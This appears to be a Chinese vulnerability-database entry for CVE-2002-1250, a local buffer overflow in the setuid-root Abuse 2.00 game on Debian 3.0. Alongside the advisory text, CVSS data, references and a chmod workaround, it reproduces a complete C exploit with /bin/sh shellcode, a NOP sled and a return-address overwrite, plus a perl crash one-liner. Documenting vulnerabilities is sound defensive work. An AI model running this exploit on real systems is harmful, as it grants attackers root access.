CVE-2002-1250
CVSS7.2
发布时间 :2002-11-12 00:00:00
修订时间 :2008-09-10 15:14:09
NMCOES    

[原文]Buffer overflow in Abuse 2.00 and earlier allows local users to gain root privileges via a long -net command line argument.


[CNNVD]Abuse本地缓冲区溢出漏洞(CNNVD-200211-032)

        
        Abuse是一款流行的视频游戏。
        Abuse包含的abuse.console和abuse.x11R6两个程序对用户提交的参数缺少正确的检查,本地攻击者可以利用这个漏洞进行缓冲区溢出攻击,可能以root用户权限在系统上执行任意指令。
        Abuse包含的abuse.console和abuse.x11R6两个程序对"-net"命令行选项的参数缺少正确的缓冲区边界检查,攻击者可以提交超长的参数,可导致指令指针覆盖,在debian系统中安装默认这两个程序会以SETUID ROOT属性安装,精心构建提交的参数数据可能以root用户权限在系统上执行任意指令。
        Debian Linux 3.0r0 X86架构分发的Abuse 2.00存在此漏洞,其他系统中的Abuse也可能存在此漏洞。
        

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1250
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1250
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200211-032
(官方数据源) CNNVD

- 其它链接及资源

http://www.idefense.com/advisory/11.01.02.txt
(VENDOR_ADVISORY)  MISC  http://www.idefense.com/advisory/11.01.02.txt
http://www.iss.net/security_center/static/10519.php
(VENDOR_ADVISORY)  XF  abuse-net-command-bo(10519)
http://www.securityfocus.com/bid/6094
(UNKNOWN)  BID  6094
http://archives.neohapsis.com/archives/vulnwatch/2002-q4/0055.html
(UNKNOWN)  VULNWATCH  20021101 iDEFENSE Security Advisory 11.01.02: Buffer Overflow Vulnerability in Abuse

- 漏洞信息

Abuse本地缓冲区溢出漏洞
高危 边界条件错误
2002-11-12 00:00:00 2005-05-13 00:00:00
本地  
        
        Abuse是一款流行的视频游戏。
        Abuse包含的abuse.console和abuse.x11R6两个程序对用户提交的参数缺少正确的检查,本地攻击者可以利用这个漏洞进行缓冲区溢出攻击,可能以root用户权限在系统上执行任意指令。
        Abuse包含的abuse.console和abuse.x11R6两个程序对"-net"命令行选项的参数缺少正确的缓冲区边界检查,攻击者可以提交超长的参数,可导致指令指针覆盖,在debian系统中安装默认这两个程序会以SETUID ROOT属性安装,精心构建提交的参数数据可能以root用户权限在系统上执行任意指令。
        Debian Linux 3.0r0 X86架构分发的Abuse 2.00存在此漏洞,其他系统中的Abuse也可能存在此漏洞。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * # chmod -s /usr/lib/games/abuse/abuse.*
        厂商补丁:
        Abuse
        -----
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.abuse2.com

- 漏洞信息 (21980)

Abuse 2.0 Local Buffer Overflow Vulnerability (EDBID:21980)
linux local
2002-11-01 Verified
0 Girish
N/A [点击下载]
source: http://www.securityfocus.com/bid/6094/info

Vulnerabilities have been discovered in two files used by Abuse.

By passing an execessively long commandline argument to Abuse, it is possible to overrun a buffer. Exploiting this issue could allow a local attacker to overwrite sensitive memory variables, resulting in the execution of arbitrary code, within the context of Abuse process.

It should be noted that one of the affected files is installed setuid root.

It should also be noted that Abuse 2.00, packaged and distributed with the x86 architecture of Debian Linux 3.0 has been reported vulnerable. It is not yet known if other packages are affected by this issue. 

	 /*          Abuse.console version 2.0 Exploit           */
	/*            By Girish<girish@mec.ac.in>                

                     <Tested on Debian 3.0 woody>                */

#include<stdio.h>
#define RET 0xbffff55a
#define LEN 980
#define NOP 0x90

static char shellcode[]=
	"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";


long esp(void)
{
	__asm("movl %esp,%eax");
}

void  main(int argc,char *argv[])
{
	
	char cmd[1000];
	int i,x;
	long  retn;
	char buff[LEN];
	
	
	printf("\nUsage :- %s <offset>\n..",argv[0]);
	
	if(argc>1)
		retn=esp()-atoi(argv[1]);
	else
		retn=RET;

	printf("Using return Adress :- ",retn );

	for(i=0;i<LEN;i+=4)
	{
		*(long*)&buff[i]=retn;
	}

	for(i=0;i<(LEN-(strlen(shellcode)+8));i++)
	{
		*(buff+i)=NOP;

	}

	memcpy(buff+i,shellcode,strlen(shellcode));

	sprintf(cmd,"/usr/lib/games/abuse/abuse.console -net %s",buff);

	puts("executing .......");
	
	system(cmd);
	
	return;
}


		

- 漏洞信息

8864
Abuse -net Command Line Argument Overflow
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

A local overflow exists in Abuse. The -net command-line argument fails to perform proper bounds checking resulting in a buffer overflow. With a specially crafted request to the -net command line option, a malicious user can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2002-11-01 2002-10-31
2002-11-01 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

- 漏洞信息

Abuse Local Buffer Overflow Vulnerability
Boundary Condition Error 6094
No Yes
2002-11-01 12:00:00 2009-07-11 06:06:00
Discovery of this vulnerability credited to Texonet (http://www.texonet.com).

- 受影响的程序版本

Abuse Abuse 2.0
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha

- 漏洞讨论

Vulnerabilities have been discovered in two files used by Abuse.

By passing an execessively long commandline argument to Abuse, it is possible to overrun a buffer. Exploiting this issue could allow a local attacker to overwrite sensitive memory variables, resulting in the execution of arbitrary code, within the context of Abuse process.

It should be noted that one of the affected files is installed setuid root.

It should also be noted that Abuse 2.00, packaged and distributed with the x86 architecture of Debian Linux 3.0 has been reported vulnerable. It is not yet known if other packages are affected by this issue.

- 漏洞利用

The following proof of concept was supplied:

$ /usr/lib/games/abuse/abuse.console -net 'perl -e 'print "A"x500''

Exploit contributed by Girish &lt;girish@mec.ac.in&gt;:

- 解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站